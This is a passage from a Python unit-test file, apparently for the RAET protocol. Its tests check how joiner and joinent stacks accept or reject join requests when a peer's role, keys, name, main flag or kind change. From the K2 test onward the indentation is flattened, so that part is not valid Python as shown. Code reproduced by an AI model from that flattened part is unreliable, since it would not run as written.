        # Leid: Old
        # Reid: New
        # Role: Either
        # Keys: Either
        # Sameness: Not sameall
        # Mutable: No
        self.assertIs(beta.mutable, None)
        # Ensure remote status is None
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], None)
        self.assertIs(roleData['verhex'], None)
        self.assertIs(roleData['pubhex'], None)
        # Test
        console.terse("\nJoin Transaction **************\n")
        beta.join(uid=betaRemote.nuid)
        betaRemote.fuid = fakeFuid
        keep = self.copyData(betaRemote)  # snapshot after the fake fuid is in place
        self.serviceStacks([alpha, beta])
        # Action: Reject
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertIs(stack.mutable, None)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertIs(remote.acceptance, None)
        self.assertEqual(len(alpha.remotes), 0)
        self.assertEqual(len(alpha.nameRemotes), 0)
        self.assertEqual(len(beta.remotes), 1)
        self.assertEqual(len(beta.nameRemotes), 1)
        self.assertTrue(self.sameAll(betaRemote, keep))
        self.assertIn('joinent_transaction_failure', alpha.stats)
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIs(remoteData, None)
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], None)
        self.assertEqual(roleData['verhex'], None)
        self.assertEqual(roleData['pubhex'], None)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerNonVacuousImmutableRejectNewKeys(self):
        '''
        Test immutable joiner reject non vacuous join with updated keys (H6)

        Scenario: alpha regenerates its signing and encryption keys (same
        role) after beta cached a remote for it.  Immutable beta must reject
        the join and leave its cached remote unchanged.
        '''
        console.terse("{0}\n".format(self.testJoinerNonVacuousImmutableRejectNewKeys.__doc__))
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapStacks()
        # Vacuous: No
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha,
                                           main=True,
                                           name=alpha.name,
                                           verkey=alpha.local.signer.verhex,
                                           pubkey=alpha.local.priver.pubhex)
        alphaRemote = estating.RemoteEstate(stack=beta,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        betaRemote.fuid = alphaRemote.nuid
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Ensure remote status is None
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], None)
        self.assertIs(roleData['verhex'], None)
        self.assertIs(roleData['pubhex'], None)
        # Name: Either
        # Main: Either
        # Kind: Either
        # RHA: Either
        # Nuid: Old
        # Fuid: Either
        # Leid: Old
        # Reid: Either
        # Role: Old
        # Keys: New
        # Regenerate alpha's key pairs and persist so the join advertises new keys
        alpha.local.signer = nacling.Signer()
        alpha.local.priver = nacling.Privateer()
        alpha.dumpLocalRole()
        # Sameness: Not sameall
        keep = self.copyData(betaRemote)  # snapshot to prove the remote is untouched
        # Mutable: No
        self.assertIs(beta.mutable, None)
        # Test
        self.join(beta, alpha, deid=betaRemote.nuid)
        # Action: Reject
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertIs(stack.mutable, None)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertIs(remote.acceptance, None)
        self.assertEqual(len(alpha.remotes), 0)
        self.assertEqual(len(alpha.nameRemotes), 0)
        self.assertEqual(len(beta.remotes), 1)
        self.assertEqual(len(beta.nameRemotes), 1)
        self.assertTrue(self.sameAll(betaRemote, keep))
        self.assertIn('joinent_transaction_failure', alpha.stats)
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIs(remoteData, None)
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], None)
        self.assertEqual(roleData['verhex'], None)
        self.assertEqual(roleData['pubhex'], None)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerNonVacuousImmutableRejectNewRole(self):
        '''
        Test immutable joiner reject non vacuous join with updated role (H7)

        Scenario: alpha renames its role after beta cached a remote for it.
        Immutable beta (mutable is None) must reject the join and leave its
        cached remote unchanged.
        '''
        console.terse("{0}\n".format(self.testJoinerNonVacuousImmutableRejectNewRole.__doc__))
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapStacks()
        # Vacuous: No
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha,
                                           main=True,
                                           name=alpha.name,
                                           verkey=alpha.local.signer.verhex,
                                           pubkey=alpha.local.priver.pubhex)
        alphaRemote = estating.RemoteEstate(stack=beta,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        betaRemote.fuid = alphaRemote.nuid
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Name: Either
        # Main: Either
        # Kind: Either
        # RHA: Either
        # Nuid: Old
        # Fuid: Either
        # Leid: Old
        # Reid: Either
        # Role: New
        oldRole = alpha.local.role
        newRole = '{0}_new'.format(oldRole)
        alpha.local.role = newRole
        alpha.dumpLocalRole()  # persist so the join advertises the new role
        # Keys: Either
        # Sameness: Not sameall
        keep = self.copyData(betaRemote)  # snapshot to prove the remote is untouched
        # Mutable: No
        self.assertIs(beta.mutable, None)
        # Ensure remote status is None
        roleData = beta.keep.loadRemoteRoleData(oldRole)
        self.assertEqual(roleData['role'], oldRole)
        self.assertIs(roleData['acceptance'], None)
        self.assertIs(roleData['verhex'], None)
        self.assertIs(roleData['pubhex'], None)
        # Check beta knows nothing about new role
        roleData = beta.keep.loadRemoteRoleData(newRole)
        self.assertEqual(roleData['role'], newRole)
        self.assertIs(roleData['acceptance'], None)
        self.assertIs(roleData['verhex'], None)
        self.assertIs(roleData['pubhex'], None)
        # Test
        self.join(beta, alpha, deid=betaRemote.nuid)
        # Action: Reject
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertIs(stack.mutable, None)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertIs(remote.acceptance, None)
        self.assertEqual(len(alpha.remotes), 0)
        self.assertEqual(len(alpha.nameRemotes), 0)
        self.assertEqual(len(beta.remotes), 1)
        self.assertEqual(len(beta.nameRemotes), 1)
        self.assertTrue(self.sameAll(betaRemote, keep))
        self.assertIn('joinent_transaction_failure', alpha.stats)
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIs(remoteData, None)
        # Check role/keys dump (alpha.local.role is now the new role)
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], None)
        self.assertEqual(roleData['verhex'], None)
        self.assertEqual(roleData['pubhex'], None)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerNonVacuousRejectedRejectNewKeys(self):
        '''
        Test mutable joiner reject non vacuous join with updated keys (I1)

        Scenario: beta has alpha's role already marked rejected and runs in
        auto-never mode.  Alpha regenerates its keys; even though beta is
        mutable, the rejected status makes the join fail and the cached
        remote stays unchanged.
        '''
        console.terse("{0}\n".format(self.testJoinerNonVacuousRejectedRejectNewKeys.__doc__))
        # Mode: Never, Once
        alpha, beta = self.bootstrapStacks()
        beta.keep.auto = raeting.AutoMode.never.value  # no auto accept of keys
        # Vacuous: No
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha,
                                           main=True,
                                           name=alpha.name,
                                           verkey=alpha.local.signer.verhex,
                                           pubkey=alpha.local.priver.pubhex)
        alphaRemote = estating.RemoteEstate(stack=beta,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        betaRemote.fuid = alphaRemote.nuid
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Status: Rejected
        beta.keep.rejectRemote(betaRemote)
        # Ensure remote status is Rejected
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Name: Either
        # Main: Either
        # Kind: Either
        # RHA: Either
        # Nuid: Old
        # Fuid: Either
        # Leid: Old
        # Reid: Either
        # Role: Old
        # Keys: New
        # Regenerate alpha's key pairs and persist so the join advertises new keys
        alpha.local.signer = nacling.Signer()
        alpha.local.priver = nacling.Privateer()
        alpha.dumpLocalRole()
        # Sameness: Not sameall
        keep = self.copyData(betaRemote)  # snapshot to prove the remote is untouched
        # Mutable: Yes
        beta.mutable = True
        # Test
        self.join(beta, alpha, deid=betaRemote.nuid)
        # Action: Reject
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertIs(remote.acceptance, raeting.Acceptance.rejected.value)
        self.assertIs(alpha.mutable, None)
        self.assertTrue(beta.mutable)
        self.assertEqual(len(alpha.remotes), 0)
        self.assertEqual(len(alpha.nameRemotes), 0)
        self.assertEqual(len(beta.remotes), 1)
        self.assertEqual(len(beta.nameRemotes), 1)
        self.assertTrue(self.sameAll(betaRemote, keep))
        self.assertIn('joinent_transaction_failure', alpha.stats)
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIs(remoteData, None)
        # Check role/keys dump: still rejected with beta's cached (old) keys
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
        self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
        self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerNonVacuousRejectedRejectNewRole(self):
        '''
        Test mutable joiner reject non vacuous join with updated role (I2)

        Scenario: beta (auto-never) has alpha's old role marked rejected.
        Alpha renames its role; the remote is re-rejected mid-transaction
        and the join ultimately fails after a renewal attempt, so beta ends
        up with no remotes and two joiner failures.
        '''
        console.terse("{0}\n".format(self.testJoinerNonVacuousRejectedRejectNewRole.__doc__))
        # Mode: Never
        alpha, beta = self.bootstrapStacks()
        beta.keep.auto = raeting.AutoMode.never.value  # no auto accept of keys
        # Vacuous: No
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha,
                                           main=True,
                                           name=alpha.name,
                                           verkey=alpha.local.signer.verhex,
                                           pubkey=alpha.local.priver.pubhex)
        alphaRemote = estating.RemoteEstate(stack=beta,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        betaRemote.fuid = alphaRemote.nuid
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Status: Rejected
        beta.keep.rejectRemote(betaRemote)
        # Name: Either
        # Main: Either
        # Kind: Either
        # RHA: Either
        # Nuid: Old
        # Fuid: Either
        # Leid: Old
        # Reid: Either
        # Role: New
        oldRole = alpha.local.role
        newRole = '{0}_new'.format(oldRole)
        alpha.local.role = newRole
        alpha.dumpLocalRole()  # persist so the join advertises the new role
        # Keys: Either
        # Sameness: Not sameall
        keep = self.copyData(betaRemote)  # snapshot of the pre-join remote state
        # Mutable: Yes
        beta.mutable = True
        # Ensure remote status is Rejected
        roleData = beta.keep.loadRemoteRoleData(oldRole)
        self.assertEqual(roleData['role'], oldRole)
        self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Check beta knows nothing about new role
        roleData = beta.keep.loadRemoteRoleData(newRole)
        self.assertEqual(roleData['role'], newRole)
        self.assertIs(roleData['acceptance'], None)
        self.assertIs(roleData['verhex'], None)
        self.assertIs(roleData['pubhex'], None)
        # Test
        self.join(beta, alpha, deid=betaRemote.nuid)
        # Re-reject after the first join attempt, then service long enough
        # for the renewal round to play out and fail as well
        beta.keep.rejectRemote(betaRemote)
        self.serviceStacks([alpha, beta], duration=6.0)
        # Action: Reject
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        self.assertEqual(len(alpha.remotes), 1)
        self.assertEqual(len(alpha.nameRemotes), 1)
        self.assertEqual(len(beta.remotes), 0)
        self.assertEqual(len(beta.nameRemotes), 0)
        self.assertIs(alpha.mutable, None)
        self.assertTrue(beta.mutable)
        self.assertIs(betaRemote.acceptance, raeting.Acceptance.rejected.value)
        self.assertFalse(self.sameAll(betaRemote, keep))
        self.assertIn('joinent_transaction_failure', alpha.stats)
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 2)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIs(remoteData, None)
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
        self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
        self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerNonVacuousRejectedRejectSameRoleKeys(self):
        '''
        Test joiner reject rejected non vacuous renewal join with same role/keys (J1)

        Scenario: beta (auto-never) has alpha's role already rejected; alpha
        renames its estate (same role and keys).  The renewal join must be
        rejected on both sides and beta's cached remote left unchanged.
        '''
        console.terse("{0}\n".format(self.testJoinerNonVacuousRejectedRejectSameRoleKeys.__doc__))
        # Mode: Never, Once
        alpha, beta = self.bootstrapStacks()
        beta.keep.auto = raeting.AutoMode.never.value  # no auto accept of keys
        # Vacuous: No
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha,
                                           main=True,
                                           name=alpha.name,
                                           verkey=alpha.local.signer.verhex,
                                           pubkey=alpha.local.priver.pubhex)
        alphaRemote = estating.RemoteEstate(stack=beta,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        betaRemote.fuid = alphaRemote.nuid
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Status: Rejected
        beta.keep.rejectRemote(betaRemote)
        # Name: Either
        oldName = alpha.name
        newName = '{0}_new'.format(oldName)
        alpha.name = newName
        # Main: Either
        # Kind: Either
        # RHA: Old
        # Nuid: Old
        # Fuid: Body
        # Leid: Old
        # Reid: 0
        # Role: Old
        # Keys: Old
        # Sameness: Same Role/Keys
        keep = self.copyData(betaRemote)  # snapshot to prove the remote is untouched
        # Mutable: Either
        # Ensure remote status is Rejected
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Test
        self.join(beta, alpha, deid=betaRemote.nuid)
        # Action: Reject, Remove Clear
        for stack in [alpha, beta]:
            self.assertTrue(len(stack.stats) > 0)
            self.assertIs(stack.mutable, None)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        self.assertEqual(len(alpha.remotes), 0)
        self.assertEqual(len(alpha.nameRemotes), 0)
        self.assertEqual(len(beta.remotes), 1)
        self.assertEqual(len(beta.nameRemotes), 1)
        self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
        self.assertEqual(len(alpha.transactions), 0)
        self.assertEqual(len(beta.transactions), 0)
        self.assertTrue(self.sameAll(betaRemote, keep))
        self.assertIn('joinent_transaction_failure', alpha.stats)
        self.assertEqual(alpha.stats['joinent_transaction_failure'], 1)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 1)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIs(remoteData, None)
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
        self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
        self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerNonVacuousRejectedRejectSameAll(self):
        '''
        Test joiner reject rejected non vacuous renewal join with same all (J2)

        Scenario: beta (auto-never) has alpha's role rejected and nothing
        about alpha has changed (sameall).  The renewal join is rejected;
        beta removes its remote while alpha is left with a pending
        transaction and its own remote intact.
        '''
        console.terse("{0}\n".format(self.testJoinerNonVacuousRejectedRejectSameAll.__doc__))
        # Mode: Never, Once
        alpha, beta = self.bootstrapStacks()
        beta.keep.auto = raeting.AutoMode.never.value  # no auto accept of keys
        # Vacuous: Yes
        # NOTE(review): comment says vacuous yes while the test name says non
        # vacuous -- presumably the renewal leg is vacuous; confirm intent.
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha,
                                           main=True,
                                           name=alpha.name,
                                           verkey=alpha.local.signer.verhex,
                                           pubkey=alpha.local.priver.pubhex)
        alphaRemote = estating.RemoteEstate(stack=beta,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        betaRemote.fuid = alphaRemote.nuid
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Status: Rejected
        beta.keep.rejectRemote(betaRemote)
        # Name: Old
        # Main: Old
        # Kind: Old
        # RHA: Old
        # Nuid: Old
        # Fuid: Body
        # Leid: Old
        # Reid: 0
        # Role: Old
        # Keys: Old
        # Sameness: SameAll
        keep = self.copyData(betaRemote)  # snapshot to prove the remote is untouched
        # Mutable: Either
        # Ensure remote status is Rejected
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Test
        self.join(beta, alpha, deid=betaRemote.nuid)
        # Action: Reject, Remove Clear
        for stack in [alpha, beta]:
            self.assertTrue(len(stack.stats) > 0)
            self.assertIs(stack.mutable, None)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        self.assertEqual(len(alpha.remotes), 1)
        self.assertEqual(len(alpha.nameRemotes), 1)
        self.assertEqual(len(beta.remotes), 0)
        self.assertEqual(len(beta.nameRemotes), 0)
        self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
        self.assertEqual(len(alpha.transactions), 1)
        self.assertEqual(len(beta.transactions), 0)
        self.assertTrue(self.sameAll(betaRemote, keep))
        self.assertNotIn('joinent_transaction_failure', alpha.stats)
        self.assertIn('joiner_transaction_failure', beta.stats)
        self.assertEqual(beta.stats['joiner_transaction_failure'], 2)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        self.assertIs(remoteData, None)
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
        self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
        self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
    def testJoinerNonVacuousAcceptNewName(self):
        '''
        Test mutable joiner accept non vacuous renewal join with updated name (K1)

        Scenario: alpha and beta are already joined; alpha renames itself.
        Because beta is mutable, the rejoin is accepted, beta updates its
        cached remote name (role and keys unchanged) and dumps the remote.
        '''
        console.terse("{0}\n".format(self.testJoinerNonVacuousAcceptNewName.__doc__))
        # Status: Accepted (auto accept keys)
        # Mode: Never, Once, Always
        alpha, beta = self.bootstrapJoinedRemotes()
        betaRemote = beta.remotes.values()[0]  # py2: dict values() is indexable
        # Name: New
        oldName = alpha.name
        newName = '{0}_new'.format(oldName)
        alpha.name = newName
        # Main: Either
        # Kind: Either
        # RHA: Either
        # Nuid: Old
        # Fuid: Either
        # Leid: Old
        # Reid: Either
        # Role: Either
        # Keys: Either
        # Sameness: Not sameall
        keep = self.copyData(betaRemote)  # snapshot to compare against post-join state
        # Mutable: Yes
        beta.mutable = True
        # Vacuous: No
        # Ensure remote status is Accepted
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Test
        self.join(beta, alpha, deid=betaRemote.nuid)
        # Action: Accept, Dump
        for stack in [alpha, beta]:
            self.assertEqual(len(stack.transactions), 0)
            self.assertEqual(len(stack.remotes), 1)
            self.assertEqual(len(stack.nameRemotes), 1)
            for remote in stack.remotes.values():
                self.assertTrue(remote.joined)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
                self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
        self.assertIs(alpha.mutable, None)
        self.assertTrue(beta.mutable)
        # Remote changed (new name) but role/keys are preserved
        self.assertFalse(self.sameAll(betaRemote, keep))
        self.assertTrue(self.sameRoleKeys(betaRemote, keep))
        self.assertEqual(betaRemote.name, newName)
        self.assertIn('join_correspond_complete', alpha.stats)
        self.assertEqual(alpha.stats['join_correspond_complete'], 2)
        self.assertIn('join_initiate_complete', beta.stats)
        self.assertEqual(beta.stats['join_initiate_complete'], 2)
        # Check remote dump
        remoteData = beta.keep.loadRemoteData(alpha.local.name)
        remoteData['ha'] = tuple(remoteData['ha'])  # keep stores ha as a list
        self.assertTrue(self.sameAll(betaRemote, remoteData))
        # Check role/keys dump
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        for stack in [alpha, beta]:
            stack.server.close()
            stack.clearAllKeeps()
def testJoinerNonVacuousAcceptNewMain(self):
'''
Test mutable joiner accept non vacuous join with updated main (K2)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousAcceptNewMain.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
# Main: New, it can only happen if old Main value is False (or None) it's because Joinent could only be main
# to accept transaction. So bootstrap slave alpha joined to main beta. Then set alpha to be main and rejoin.
beta, alpha = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
# Name: Either
# Main: New
oldMain = None
newMain = True
self.assertIs(alpha.main, oldMain)
alpha.main = newMain
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Vacuous: No
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
# Renew: Yes
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertTrue(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.main, newMain)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousAcceptNewKind(self):
'''
Test mutable joiner accept non vacuous join with updated kind (K3)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousAcceptNewKind.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
# Name: Either
# Main: Either
# Kind: New
oldKind = alpha.kind
newKind = 33
self.assertNotEqual(oldKind, newKind)
alpha.kind = newKind
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Vacuous: No
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertTrue(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.kind, newKind)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
